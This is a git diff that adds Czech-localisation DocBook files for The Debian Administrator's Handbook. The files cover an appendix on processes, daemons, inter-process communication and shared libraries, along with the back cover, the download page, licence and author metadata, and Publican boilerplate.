+				Sometimes, the child process continues to lead its own life independently from its parent, with its own data copied from the parent process. In many cases, though, this child process executes another program. With a few exceptions, its memory is simply replaced by that of the new program, and execution of this new program begins. This is the mechanism used by the init process (with process number 1) to start additional services and execute the whole startup sequence. At some point, one process among <command>init</command>'s offspring starts a graphical interface for users to log in to (the actual sequence of events is described in more details in <xref linkend="sect.system-boot" />).
+			</para>
+			 <para>
+				When a process finishes the task for which it was started, it terminates. The kernel then recovers the memory assigned to this process, and stops giving it slices of running time. The parent process is told about its child process being terminated, which allows a process to wait for the completion of a task it delegated to a child process. This behavior is plainly visible in command-line interpreters (known as <emphasis>shells</emphasis>). When a command is typed into a shell, the prompt only comes back when the execution of the command is over. Most shells allow for running the command in the background, it is a simple matter of adding an <userinput>&amp;</userinput> to the end of the command. The prompt is displayed again right away, which can lead to problems if the command needs to display data of its own.
+			</para>
+
+		</section>
+		 <section id="sect.daemons">
+			<title>Daemons</title>
+			 <indexterm>
+				<primary>daemon</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>daemon</primary>
+			</indexterm>
+			 <para>
+				A “daemon” is a process started automatically by the boot sequence. It keeps running (in the background) to perform maintenance tasks or provide services to other processes. This “background task” is actually arbitrary, and does not match anything particular from the system's point of view. They are simply processes, quite similar to other processes, which run in turn when their time slice comes. The distinction is only in the human language: a process that runs with no interaction with a user (in particular, without any graphical interface) is said to be running “in the background” or “as a daemon”.
+			</para>
+			 <sidebar> <title><emphasis>VOCABULARY</emphasis> Daemon, demon, a derogatory term?</title>
+			 <para>
+				Although <emphasis>daemon</emphasis> term shares its Greek etymology with <emphasis>demon</emphasis>, the former does not imply diabolical evil, instead, it should be understood as a kind of helper spirit. This distinction is subtle enough in English; it is even worse in other languages where the same word is used for both meanings.
+			</para>
+			 </sidebar> <para>
+				Several such daemons are described in detail in <xref linkend="unix-services" />.
+			</para>
+
+		</section>
+		 <section id="sect.ipc">
+			<title>Inter-Process Communications</title>
+			 <indexterm>
+				<primary>IPC</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Inter-Process Communications</primary>
+			</indexterm>
+			 <para>
+				An isolated process, whether a daemon or an interactive application, is rarely useful on its own, which is why there are several methods allowing separate processes to communicate together, either to exchange data or to control one another. The generic term referring to this is <emphasis>inter-process communication</emphasis>, or IPC for short.
+			</para>
+			 <para>
+				The simplest IPC system is to use files. The process that wishes to send data writes it into a file (with a name known in advance), while the recipient only has to open the file and read its contents.
+			</para>
+			 <indexterm>
+				<primary><emphasis>pipe</emphasis></primary>
+			</indexterm>
+			 <para>
+				In the case where you do not wish to store data on disk, you can use a <emphasis>pipe</emphasis>, which is simply an object with two ends; bytes written in one end are readable at the other. If the ends are controlled by separate processes, this leads to a simple and convenient inter-process communication channel. Pipes can be classified into two categories: named pipes, and anonymous pipes. A named pipe is represented by an entry on the filesystem (although the transmitted data is not stored there), so both processes can open it independently if the location of the named pipe is known beforehand. In cases where the communicating processes are related (for instance, a parent and its child process), the parent process can also create an anonymous pipe before forking, and the child inherits it. Both processes will then be able to exchange data through the pipe without needing the filesystem.
+			</para>
+			 <sidebar> <title><emphasis>IN PRACTICE</emphasis> A concrete example</title>
+			 <para>
+				Let's describe in some detail what happens when a complex command (a <emphasis>pipeline</emphasis>) is run from a shell. We assume we have a <command>bash</command> process (the standard user shell on Debian), with <emphasis>pid</emphasis> 4374; into this shell, we type the command: <command>ls | sort</command> .
+			</para>
+			 <para>
+				The shell first interprets the command typed in. In our case, it understands there are two programs (<command>ls</command> and <command>sort</command>), with a data stream flowing from one to the other (denoted by the <userinput>|</userinput> character, known as <emphasis>pipe</emphasis>). <command>bash</command> first creates an unnamed pipe (which initially exists only within the <command>bash</command> process itself).
+			</para>
+			 <para>
+				Then the shell clones itself; this leads to a new <command>bash</command> process, with <emphasis>pid</emphasis> #4521 (<emphasis>pids</emphasis> are abstract numbers, and generally have no particular meaning). Process #4521 inherits the pipe, which means it is able to write in its “input” side; <command>bash</command> redirects its standard output stream to this pipe's input. Then it executes (and replaces itself with) the <command>ls</command> program, which lists the contents of the current directory. Since <command>ls</command> writes on its standard output, and this output has previously been redirected, the results are effectively sent into the pipe.
+			</para>
+			 <para>
+				A similar operation happens for the second command: <command>bash</command> clones itself again, leading to a new <command>bash</command> process with pid #4522. Since it is also a child process of #4374, it also inherits the pipe; <command>bash</command> then connects its standard input to the pipe output, then executes (and replaces itself with) the <command>sort</command> command, which sorts its input and displays the results.
+			</para>
+			 <para>
+				All the pieces of the puzzle are now set up: <command>ls</command> reads the current directory and writes the list of files into the pipe; <command>sort</command> reads this list, sorts it alphabetically, and displays the results. Processes numbers #4521 and #4522 then terminate, and #4374 (which was waiting for them during the operation), resumes control and displays the prompt to allow the user to type in a new command.
+			</para>
+			 </sidebar> <para>
+				Not all inter-process communications are used to move data around, though. In many situations, the only information that needs to be transmitted are control messages such as “pause execution” or “resume execution”. Unix (and Linux) provides a mechanism known as <emphasis>signals</emphasis>, through which a process can simply send a specific signal (chosen from a predefined list of signals) to another process. The only requirement is to know the <emphasis>pid</emphasis> of the target.
+			</para>
+			 <para>
+				For more complex communications, there are also mechanisms allowing a process to open access, or share, part of its allocated memory to other processes. Memory now shared between them can be used to move data between the processes.
+			</para>
+			 <para>
+				Finally, network connections can also help processes communicate; these processes can even be running on different computers, possibly thousands of kilometers apart.
+			</para>
+			 <para>
+				It is quite standard for a typical Unix-like system to make use of all these mechanisms to various degrees.
+			</para>
+
+		</section>
+		 <section id="sect.libraries">
+			<title>Libraries</title>
+			 <indexterm>
+				<primary>library (of functions)</primary>
+			</indexterm>
+			 <para>
+				Function libraries play a crucial role in a Unix-like operating system. They are not proper programs, since they cannot be executed on their own, but collections of code fragments that can be used by standard programs. Among the common libraries, you can find:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						the standard C library (<emphasis>glibc</emphasis>), which contains basic functions such as ones to open files or network connections, and others facilitating interactions with the kernel;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						graphical toolkits, such as Gtk+ and Qt, allowing many programs to reuse the graphical objects they provide;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						the <emphasis>libpng</emphasis> library, that allows loading, interpreting and saving images in the PNG format.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <para>
+				Thanks to those libraries, applications can reuse existing code. Application development is simplified since many applications can reuse the same functions. With libraries often developed by different persons, the global development of the system is closer to Unix's historical philosophy.
+			</para>
+			 <sidebar> <title><emphasis>CULTURE</emphasis> The Unix Way: one thing at a time</title>
+			 <para>
+				One of the fundamental concepts that underlies the Unix family of operating systems is that each tool should only do one thing, and do it well; applications can then reuse these tools to build more advanced logic on top. This philosophy can be seen in many incarnations. Shell scripts may be the best example: they assemble complex sequences of very simple tools (such as <command>grep</command>, <command>wc</command>, <command>sort</command>, <command>uniq</command> and so on). Another implementation of this philosophy can be seen in code libraries: the <emphasis>libpng</emphasis> library allows reading and writing PNG images, with different options and in different ways, but it does only that; no question of including functions that display or edit images.
+			</para>
+			 </sidebar> <para>
+				Moreover, these libraries are often referred to as “shared libraries”, since the kernel is able to only load them into memory once, even if several processes use the same library at the same time. This allows saving memory, when compared with the opposite (hypothetical) situation where the code for a library would be loaded as many times as there are processes using it.
+			</para>
+
+		</section>
+
+	</section>
+</appendix>
+
diff --git a/tmp/cs-CZ/xml/99_backcover.xml b/tmp/cs-CZ/xml/99_backcover.xml
new file mode 100644
index 000000000..cb6460a51
--- /dev/null
+++ b/tmp/cs-CZ/xml/99_backcover.xml
@@ -0,0 +1,26 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE appendix PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<appendix id="backcover" lang="cs-CZ">
+	<title>The Debian Administrator's Handbook</title>
+	 <subtitle>Debian Jessie from Discovery to Mastery</subtitle>
+	 <para>
+		Debian GNU/Linux, a very popular non-commercial Linux distribution, is known for its reliability and richness. Built and maintained by an impressive network of thousands of developers throughout the world, the Debian project is cemented by its social contract. This foundation text defines the project's objective: fulfilling the needs of users with a 100% free operating system. The success of Debian and of its ecosystem of derivative distributions (with Ubuntu at the forefront) means that an increasing number of administrators are exposed to Debian's technologies.
+	</para>
+	 <para>
+		This Debian Administrator's Handbook, which has been entirely updated for Debian 8 “Jessie”, builds on the success of its 6 previous editions. Accessible to all, this book teaches the essentials to anyone who wants to become an effective and independent Debian GNU/Linux administrator. It covers all the topics that a competent Linux administrator should master, from installation to updating the system, creating packages and compiling the kernel, but also monitoring, backup and migration, without forgetting advanced topics such as setting up SELinux or AppArmor to secure services, automated installations, or virtualization with Xen, KVM or LXC.
+	</para>
+	 <para>
+		This book is not only designed for professional system administrators. Anyone who uses Debian or Ubuntu on their own computer is de facto an administrator and will find tremendous value in knowing more about how their system works. Being able to understand and resolve problems will save you invaluable time.
+	</para>
+	 <para>
+		<emphasis role="strong">Raphaël Hertzog</emphasis> is a computer science engineer who graduated from the National Institute of Applied Sciences (INSA) in Lyon, France, and has been a Debian developer since 1997. The founder of Freexian, the first French IT services company specialized in Debian GNU/Linux, he is one of the most prominent contributors to this Linux distribution.
+	</para>
+	 <para>
+		<emphasis role="strong">Roland Mas</emphasis> is a telecommunications engineer who graduated from the National Superior School of Telecommunications (ENST) in Paris, France. A Debian developer since 2000 as well as the developer of the FusionForge software, he works as a freelance consultant who specializes in the installation and migration of Debian GNU/Linux systems and in setting up collaborative work tools.
+	</para>
+	 <para>
+		This book has a story. It started its life as a French-language book (Cahier de l'Admin Debian published by Eyrolles) and has been translated into English thanks to hundreds of persons who contributed to a fundraising. Learn more at https://debian-handbook.info, where you can also obtain an electronic version of this book.
+	</para>
+</appendix>
+
diff --git a/tmp/cs-CZ/xml/99_website.xml b/tmp/cs-CZ/xml/99_website.xml
new file mode 100644
index 000000000..3cbec93ac
--- /dev/null
+++ b/tmp/cs-CZ/xml/99_website.xml
@@ -0,0 +1,68 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE appendix PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<appendix id="website" lang="cs-CZ">
+	<title>Get the book</title>
+	 <para>
+		Before going further, if you want to make up your mind about the book, you're invited to <ulink url="https://debian-handbook.info/browse/en-US/stable/">browse the online version</ulink>.
+	</para>
+	 <section id="sect.buy-the-paperback">
+		<title>Buy the English Paperback</title>
+		 <para>
+			The paperback is available through Lulu's print-on-demand service at a price of €44.90 (without VAT and shipping). <ulink url="">Click here to view the book details on Lulu.com</ulink>. Click on the button below to buy it directly.
+		</para>
+
+	</section>
+	 <section id="sect.download-the-electronic-version">
+		<title>Download the electronic version</title>
+		 <para>
+			The e-book is available in 3 formats (PDF, EPUB, Mobipocket) and multiple languages.
+		</para>
+		 <para>
+			The book is freely available because we want everybody to benefit from it. That said maintaining it for each new Debian release takes time and lots of effort, and we appreciate being thanked for this. If you find this book valuable, please consider contributing to its continued maintenance either by buying a paperback copy or by making a donation via the form below (after having completed your donation, you will be automatically directed to the download page).
+		</para>
+		 <para>
+			Pick your contribution:
+		</para>
+		 <para>
+			You can also directly download the book on <ulink url="https://debian-handbook.info/get/now/">this page</ulink>. In that case, we hope that you will contribute to the book's success by spreading the word around you. Of course, you can always come back later to make a donation.
+		</para>
+
+	</section>
+	 <section id="sect.download-the-book">
+		<title>Download the book</title>
+		 <para>
+			<emphasis>Thank you very much for your donation</emphasis>. We really appreciate it. We hope that you will enjoy our book!
+		</para>
+		 <para>
+			The book is available in 3 formats and multiple languages (see other tabs for translations).
+		</para>
+		 <para>
+			The PDF format is the document corresponding to the printed book. It's not suitable for reading on small screens. The EPUB format is the recommended format if your reading devices supports it (most smartphones and many ebook readers do support it). The Mobipocket format is mainly for ebook readers that do not support EPUB (like the Kindle).
+		</para>
+		 <para>
+			Click on the link of the version that you wish to download:
+		</para>
+		 <itemizedlist>
+			<listitem>
+				<para>
+					English PDF (30 Mb)
+				</para>
+			</listitem>
+			 <listitem>
+				<para>
+					English EPUB (5 Mb)
+				</para>
+			</listitem>
+			 <listitem>
+				<para>
+					English Mobipocket (13 Mb)
+				</para>
+			</listitem>
+
+		</itemizedlist>
+
+	</section>
+
+</appendix>
+
diff --git a/tmp/cs-CZ/xml/Author_Group.xml b/tmp/cs-CZ/xml/Author_Group.xml
new file mode 100644
index 000000000..fa0c6ba45
--- /dev/null
+++ b/tmp/cs-CZ/xml/Author_Group.xml
@@ -0,0 +1,18 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE authorgroup PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<authorgroup lang="cs-CZ">
+	<author>
+		<firstname>Raphaël</firstname>
+		 <surname>Hertzog</surname>
+		 <email>hertzog@debian.org</email>
+
+	</author>
+	 <author>
+		<firstname>Roland</firstname>
+		 <surname>Mas</surname>
+		 <email>lolando@debian.org</email>
+
+	</author>
+</authorgroup>
+
diff --git a/tmp/cs-CZ/xml/Book_Info.xml b/tmp/cs-CZ/xml/Book_Info.xml
new file mode 100644
index 000000000..d5e9cab75
--- /dev/null
+++ b/tmp/cs-CZ/xml/Book_Info.xml
@@ -0,0 +1,115 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE bookinfo PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<bookinfo id="book-tdah" lang="cs-CZ">
+	<title>The Debian Administrator's Handbook</title>
+	 <subtitle>Debian Stretch from Discovery to Mastery</subtitle>
+	 <productname>Debian</productname>
+	 <productnumber>9</productnumber>
+	 <edition>1</edition>
+	 <pubsnumber>0</pubsnumber>
+	 <publisher>
+		<publishername>
+			Freexian SARL
+		</publishername>
+		 
+<address><city>Sorbiers</city></address>
+
+	</publisher>
+	 <abstract>
+		<para>
+			A reference book presenting the Debian distribution, from initial installation to configuration of services.
+		</para>
+
+	</abstract>
+	 <legalnotice>
+		<para>
+			ISBN: 979-10-91414-16-6 (English paperback)
+		</para>
+		 <para>
+			ISBN: 979-10-91414-17-3 (English ebook)
+		</para>
+		 <para>
+			This book is available under the terms of two licenses compatible with the Debian Free Software Guidelines.
+		</para>
+		 <formalpara>
+			<title>Creative Commons License Notice:</title>
+			 <para>
+				This book is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported License. <ulink type="block" url="http://creativecommons.org/licenses/by-sa/3.0/" />
+			</para>
+
+		</formalpara>
+		 <formalpara>
+			<title>GNU General Public License Notice:</title>
+			 <para>
+				This book is free documentation: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 2 of the License, or (at your option) any later version.
+			</para>
+
+		</formalpara>
+		 <para>
+			This book is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
+		</para>
+		 <para>
+			You should have received a copy of the GNU General Public License along with this program. If not, see <ulink url="http://www.gnu.org/licenses/" />.
+		</para>
+		 <important>
+			<title>Show your appreciation</title>
+			 <para>
+				This book is published under a free license because we want everybody to benefit from it. That said maintaining it takes time and lots of effort, and we appreciate being thanked for this. If you find this book valuable, please consider contributing to its continued maintenance either by buying a paperback copy or by making a donation through the book's official website: <ulink type="block" url="http://debian-handbook.info" />
+			</para>
+
+		</important>
+
+	</legalnotice>
+	 <xi:include href="Author_Group.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+	 <copyright>
+		<year>2003</year>
+		 <year>2004</year>
+		 <year>2005</year>
+		 <year>2006</year>
+		 <year>2007</year>
+		 <year>2008</year>
+		 <year>2009</year>
+		 <year>2010</year>
+		 <year>2011</year>
+		 <year>2012</year>
+		 <year>2013</year>
+		 <year>2014</year>
+		 <year>2015</year>
+		 <year>2016</year>
+		 <year>2017</year>
+		 <holder>Raphaël Hertzog</holder>
+
+	</copyright>
+	 <copyright>
+		<year>2006</year>
+		 <year>2007</year>
+		 <year>2008</year>
+		 <year>2009</year>
+		 <year>2010</year>
+		 <year>2011</year>
+		 <year>2012</year>
+		 <year>2013</year>
+		 <year>2014</year>
+		 <year>2015</year>
+		 <holder>Roland Mas</holder>
+
+	</copyright>
+	 <copyright>
+		<year>2012</year>
+		 <year>2013</year>
+		 <year>2014</year>
+		 <year>2015</year>
+		 <year>2016</year>
+		 <year>2017</year>
+		 <holder>Freexian SARL</holder>
+
+	</copyright>
+	 <mediaobject role="cover">
+		<imageobject>
+			<imagedata fileref="images/cover.jpg" format="JPG" />
+		</imageobject>
+
+	</mediaobject>
+</bookinfo>
+
diff --git a/tmp/cs-CZ/xml/Common_Content/Conventions.xml b/tmp/cs-CZ/xml/Common_Content/Conventions.xml
new file mode 100644
index 000000000..390a76004
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/Conventions.xml
@@ -0,0 +1,146 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE section PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<section lang="cs-CZ">
+	<title>Konvence používané v dokumentu</title>
+	 <para>
+		V tomto manuálu je použito několik konvencí pro zvýraznění určitých slov nebo vět a ke zdůraznění konkrétních informací.
+	</para>
+	 <section>
+		<title>Typografické konvence</title>
+		 <para>
+			Pro zvýraznění slov nebo vět se používají čtyři typografické konvence. Tyto konvence a situace, v nichž se uplatňují, jsou následující.
+		</para>
+		 <para>
+			<literal>Neproporcionální tučné</literal>
+		</para>
+		 <para>
+			Používá se pro zvýraznění systémového vstupu, včetně příkazů pro shell, názvy souborů a cest. A také pro zvýraznění kláves a jejich kombinací. Například:
+		</para>
+		 <blockquote>
+			<para>
+				Chcete-li zobrazit obsah souboru <filename>my_next_bestselling_novel</filename> v aktuálním adresáři, napište příkaz <command>cat my_next_bestselling_novel</command> v příkazovém řádku a stisknutím <keycap>Enter</keycap> ho spustťe.
+			</para>
+
+		</blockquote>
+		 <para>
+			Příklad výše obsahuje název souboru, příkaz shellu a klávesu. Vše vyznačeno neproporcionálním tučným písmem a odlišené díky kontextu.
+		</para>
+		 <para>
+			Kombinace kláves mohou být odlišeny od jednotlivých kláves znaménkem plus, které spojuje každou část kombinace. Například:
+		</para>
+		 <blockquote>
+			<para>
+				Příkaz spusťte stisknutím<keycap>Enter</keycap> .
+			</para>
+			 <para>
+				Do virtuálního terminálu se přepnete stiskem <keycombo><keycap>Ctrl</keycap><keycap>Alt</keycap><keycap>F2</keycap></keycombo>.
+			</para>
+
+		</blockquote>
+		 <para>
+			První příklad zvýrazňuje konkrétní klávesu, kterou máte stisknout. Druhý příklad zvýrazňuje kombinaci kláves: tři klávesy stisknuté najednou.
+		</para>
+		 <para>
+			Hovoří-li se o zdrojovém kódu, názvy tříd, metody, funkce, názvy proměnných a návratové hodnoty uvedené v odstavci budou rovněž vysázeny jako v příkladu výše, <literal>neproporcionálním tučným</literal> písmem. Například:
+		</para>
+		 <blockquote>
+			<para>
+				Mezi třídy související se soubory patří <classname>filesystem</classname> pro souborový systém, <classname>file</classname> pro soubory a <classname>dir</classname> pro adresáře. Každá z těchto tříd má vlastní sadu oprávnění.
+			</para>
+
+		</blockquote>
+		 <para>
+			<application>Proporcionální tučné</application>
+		</para>
+		 <para>
+			Tak se odlišují slova nebo fráze, které lze spatřit na systému, včetně názvů aplikací; textu v dialogových oknech; názvů tlačítek; popisků výběrových tlačítek; názvů nabídek a podnabídek. Například:
+		</para>
+		 <blockquote>
+			<para>
+				Z hlavní nabídkové lišty zvolte <menuchoice><guimenu>Systém</guimenu><guisubmenu>Předvolby</guisubmenu><guimenuitem>Myš</guimenuitem></menuchoice>, čímž spustíte <application>Předvolby myši</application>. Na kartě <guilabel>Tlačítka</guilabel> zatrhněte zaškrtávací tlačítko <guilabel>Myš pro leváky</guilabel> a klepněte na <guibutton>Zavřít</guibutton>, abyste změnili hlavní tlačítko myši z levého na pravé (vhodné nastavení myší pro požívání levou rukou).
+			</para>
+			 <para>
+				Chcete-li do souboru <application>gedit</application> vložit speciální znak, vyberte <menuchoice><guimenu>Aplikace</guimenu><guisubmenu>Příslušenství</guisubmenu><guimenuitem>Mapa znaků</guimenuitem></menuchoice> z lišty hlavní nabídky. Dále vyberte <menuchoice><guimenu>Vyhledat</guimenu><guimenuitem>Hledat…</guimenuitem></menuchoice> z nabídkové lišty <application>Mapa znaků</application>, napiště jméno znaku v poli <guilabel>Hledat</guilabel> a klepněte na <guibutton>Další</guibutton>. Znak, který hledáte bude zvýrazněn v <guilabel>Tabulce znaků</guilabel>. Poklepejte na tento zvýrazněný znak k přesunutí do pole <guilabel>Text ke zkopírování</guilabel> a poté klepněte na tlačítko <guibutton>Zkopírovat</guibutton>. Nyní přejděte zpět do vašeho dokumentu a vyberte<menuchoice><guimenu>Úpravy</guimenu><guimenuitem>Vložit</guimenuitem></menuchoice> z nabídkové lišty <application>gedit</application>.
+			</para>
+
+		</blockquote>
+		 <para>
+			Výše uvedený text obsahuje názvy aplikací; názvy systémových nabídek a položek; názvy aplikačních nabídek; a tlačítka a text nalézající se v GUI rozhraní, vše vysázené proporcionálním tučným písmem a odlišené kontextem.
+		</para>
+		 <para>
+			<command><replaceable>Neproporcionální tučná kurzíva</replaceable></command> nebo <application><replaceable>Proporcionální tučná kurzíva</replaceable></application>
+		</para>
+		 <para>
+			Ať již neproporcionální či proporcionální tučné písmo, je-li doplněno o kurzívu, označuje proměnný či nahraditelný text. Kurzíva odlišuje text, který nevkládáme doslovně, nebo zobrazený text, který se mění v závislosti na podmínkách. Například:
+		</para>
+		 <blockquote>
+			<para>
+				Chcete-li se připojit ke vzdálenému systému prostřednictvím ssh, zadejte <command>ssh <replaceable>username</replaceable>@<replaceable>domain.name</replaceable></command> v příkazovém řádku. Je-li vzdáleným systémem <filename>example.com</filename> a vaše uživatelské jméno v tomto systému je john, zadejte <command>ssh john@example.com</command>.
+			</para>
+			 <para>
+				Příkaz <command>mount -o remount <replaceable>file-system</replaceable></command> znovu připojí zadaný souborový systém. Chcete-li například znovu připojit souborový systém<filename>/home</filename>, je odpovídajícím příkazem <command>mount -o remount /home</command>.
+			</para>
+			 <para>
+				Chcete-li zobrazit verzi nainstalovaného balíčku, použijte příkaz <command>rpm -q <replaceable>package</replaceable></command>. Jeho výstup bude následující: <command><replaceable>package-version-release</replaceable></command>.
+			</para>
+
+		</blockquote>
+		 <para>
+			Všimněte si slov v tučné kurzívě výše - username, domain.name, file-system, package, version a release.
+		</para>
+		 <para>
+			Vedle obvyklého použití pro název díla se kurzíva používá k vyznačení prvího použití nového důležitého termínu. Například:
+		</para>
+		 <blockquote>
+			<para>
+				Publican je publikační systém <firstterm>DocBook</firstterm>.
+			</para>
+
+		</blockquote>
+
+	</section>
+	 <section>
+		<title>Konvence pro Citace</title>
+		 <para>
+			Výstup terminálu a výpisy zdrojového kódu jsou od ostatního textu odděleny vizuálně.
+		</para>
+		 <para>
+			Výstup poslaný na terminál je uveden v <computeroutput>neproporcionální roman</computeroutput> a vysázen takto:
+		</para>
+		 
+<screen>books        Desktop   documentation  drafts  mss    photos   stuff  svn
+books_tests  Desktop1  downloads      images  notes  scripts  svgs</screen>
+		 <para>
+			Výpisy zdrojového kódu jsou také uváděny v <computeroutput>neproporcionální roman</computeroutput>, ale s přidaným zvýrazňováním systaxe, jako zde:
+		</para>
+		 <xi:include href="Program_Listing.xml" xmlns:xi="http://www.w3.org/2001/XInclude" />
+
+	</section>
+	 <section>
+		<title>Poznámky a Varování</title>
+		 <para>
+			Pro zvýraznění informací, které by jinak mohly být přehlédnuty, používáme tři vizuální styly.
+		</para>
+		 <note>
+			<para>
+				Poznámky jsou typy, zkratky či alternativní přístupy ke zpracovávaným úkolům. Přehlížení poznámek by nemělo mít negativní důsledky, ale můžete se tak ochudit o informace (triky), které mohou usnadnit váš život.
+			</para>
+
+		</note>
+		 <important>
+			<para>
+				Důležitá pole poskytují podrobnosti o věcech, které lze snadno přehlédnout: změny konfigurace, které se týkají pouze současného sezení, nebo služby, které je nutné restartovat, než se projeví aktualizace. Přehlížení pole označeného 'Důležité' nezpůsobí ztrátu dat, ale může způsobit rozčílení a pocit zmaru.
+			</para>
+
+		</important>
+		 <warning>
+			<para>
+				Varování by neměla být přehlížena. Přehlížení varování povede většinou ke ztrátě dat.
+			</para>
+
+		</warning>
+
+	</section>
+</section>
+
diff --git a/tmp/cs-CZ/xml/Common_Content/Feedback.xml b/tmp/cs-CZ/xml/Common_Content/Feedback.xml
new file mode 100644
index 000000000..8bdad9d61
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/Feedback.xml
@@ -0,0 +1,15 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE section PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<section lang="cs-CZ">
+	<title>Potřebujeme zpětnou vazbu!</title>
+	 <indexterm>
+		<primary>zpětná vazba</primary>
+		 <secondary>kontaktní informace pro tento manuál</secondary>
+
+	</indexterm>
+	 <para>
+		Toto byste měli přepsat vaším vlastním lokálním souborem Feedback.xml.
+	</para>
+</section>
+
diff --git a/tmp/cs-CZ/xml/Common_Content/Legal_Notice.xml b/tmp/cs-CZ/xml/Common_Content/Legal_Notice.xml
new file mode 100644
index 000000000..6a3f75b1f
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/Legal_Notice.xml
@@ -0,0 +1,9 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE legalnotice PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<legalnotice lang="cs-CZ">
+	<para>
+		Copyright <trademark class="copyright"></trademark> &YEAR; &HOLDER; This material may only be distributed subject to the terms and conditions set forth in the GNU Free Documentation License (GFDL), V1.2 or later (the latest version is presently available at <ulink url="http://www.gnu.org/licenses/fdl.txt">http://www.gnu.org/licenses/fdl.txt</ulink>).
+	</para>
+</legalnotice>
+
diff --git a/tmp/cs-CZ/xml/Common_Content/Program_Listing.xml b/tmp/cs-CZ/xml/Common_Content/Program_Listing.xml
new file mode 100644
index 000000000..59a61315f
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/Program_Listing.xml
@@ -0,0 +1,24 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE programlisting PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+
+<programlisting lang="cs-CZ" language="Java">package org.jboss.book.jca.ex1;
+
+import javax.naming.InitialContext;
+
+public class ExClient
+{
+   public static void main(String args[]) 
+       throws Exception
+   {
+      InitialContext iniCtx = new InitialContext();
+      Object         ref    = iniCtx.lookup("EchoBean");
+      EchoHome       home   = (EchoHome) ref;
+      Echo           echo   = home.create();
+
+      System.out.println("Created Echo");
+
+      System.out.println("Echo.echo('Hello') = " + echo.echo("Hello"));
+   }
+}</programlisting>
+
diff --git a/tmp/cs-CZ/xml/Common_Content/Revision_History.xml b/tmp/cs-CZ/xml/Common_Content/Revision_History.xml
new file mode 100644
index 000000000..121a16167
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/Revision_History.xml
@@ -0,0 +1,64 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE appendix PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<appendix lang="cs-CZ">
+	<title>Revision History</title>
+	 <simpara>
+		<revhistory>
+			<revision>
+				<revnumber>3.0-0.1</revnumber>
+				 <date>Mon Mar 19 2012</date>
+				 <author>
+					<firstname>Jeff</firstname>
+					 <surname>Fearn</surname>
+					 <email>jfearn@redhat.com</email>
+				</author>
+				 <revdescription>
+					<simplelist>
+						<member>Translation files synchronised with XML sources 3.0-0</member>
+
+					</simplelist>
+
+				</revdescription>
+
+			</revision>
+			 <revision>
+				<revnumber>3.0-0.1</revnumber>
+				 <date>Mon Mar 19 2012</date>
+				 <author>
+					<firstname>Jeff</firstname>
+					 <surname>Fearn</surname>
+					 <email>jfearn@redhat.com</email>
+				</author>
+				 <revdescription>
+					<simplelist>
+						<member>Translation files synchronised with XML sources 3.0-0</member>
+
+					</simplelist>
+
+				</revdescription>
+
+			</revision>
+			 <revision>
+				<revnumber>3.0-0</revnumber>
+				 <date>Mon Mar 12 2012</date>
+				 <author>
+					<firstname>Jeff</firstname>
+					 <surname>Fearn</surname>
+					 <email>jfearn@redhat.com</email>
+				</author>
+				 <revdescription>
+					<simplelist>
+						<member>Publican 3.0</member>
+
+					</simplelist>
+
+				</revdescription>
+
+			</revision>
+
+		</revhistory>
+
+	</simpara>
+</appendix>
+
diff --git a/tmp/cs-CZ/xml/Common_Content/css/brand.css b/tmp/cs-CZ/xml/Common_Content/css/brand.css
new file mode 100644
index 000000000..d86cba937
--- /dev/null
+++ b/tmp/cs-CZ/xml/Common_Content/css/brand.css
@@ -0,0 +1,14 @@
+/*headings*/
+h1, h2, h3, h4, h5, h6,
+div.producttitle,
+div.subtitle,
+div.author div.author,
+div.translator div.translator,
+div.othercredit div.othercredit,
+div.editor div.editor,
+div.contrib div.contrib,
+.title,
+.titlepage .edition,
+.titlepage .releaseinfo {
+	color: #336699;
+}
